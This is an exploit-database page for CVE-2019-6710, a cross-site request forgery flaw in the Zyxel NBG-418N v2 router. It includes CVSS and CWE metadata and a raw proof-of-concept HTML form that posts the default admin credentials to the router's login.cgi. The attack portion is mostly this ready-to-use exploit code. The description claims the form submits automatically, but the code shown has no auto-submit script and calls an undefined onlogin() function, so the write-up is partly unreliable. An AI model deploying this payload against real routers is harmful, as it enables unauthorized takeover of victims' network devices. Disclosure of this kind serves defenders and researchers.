header-logo
Suggest Exploit
vendor:
NBG-418N v2
by:
Ali Can Gönüllü
8.8
CVSS
HIGH
CSRF
352
CWE
Product Name: NBG-418N v2
Affected Version From: V1.00(AAXM.6)C0
Affected Version To: V1.00(AAXM.6)C0
Patch Exists: YES
Related CWE: CVE-2019-6710
CPE: h:zyxel:nbg-418n_v2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 x64
2019

NBG-418N v2 Modem CSRF Exploit & PoC

This exploit allows an attacker to perform a CSRF attack on the Zyxel NBG-418N v2 Modem. The attacker can craft a malicious HTML page that contains a form with the username and password fields pre-filled with the credentials of the admin user. When the victim visits the malicious page, the form will be automatically submitted and the attacker will gain access to the modem.

Mitigation:

The vendor has released a firmware update to address this vulnerability.
Source

Exploit-DB raw data:

<!--
# Exploit Title: Zyxel NBG-418N v2 Modem CSRF Exploit & PoC
# Version: Zyxel NBG-418N v2 - V1.00(AAXM.6)C0
# Tested on: Windows 10 x64
# CVE : CVE-2019-6710
# Author : Ali Can Gönüllü
# Twitter : @alicangonullu

Exploits :
-->

<html><head>
<title>NBG-418N v2 Modem CSRF Exploit & PoC</title>
</head><body>
<form action="http://10.0.0.1/login.cgi" method="POST">
<input type="text" name="username" id="username" value="admin" /><br />
<input type="text" name="password" id="password" value="1234" /><br />
<input id="loginBtn" onclick="return onlogin()" type='submit' 
value='Go!' />
<input type="hidden" name="submit.htm?login.htm" value="Send">
</form>
</body></html>

Navigation

Suggest Exploit

Services By CQR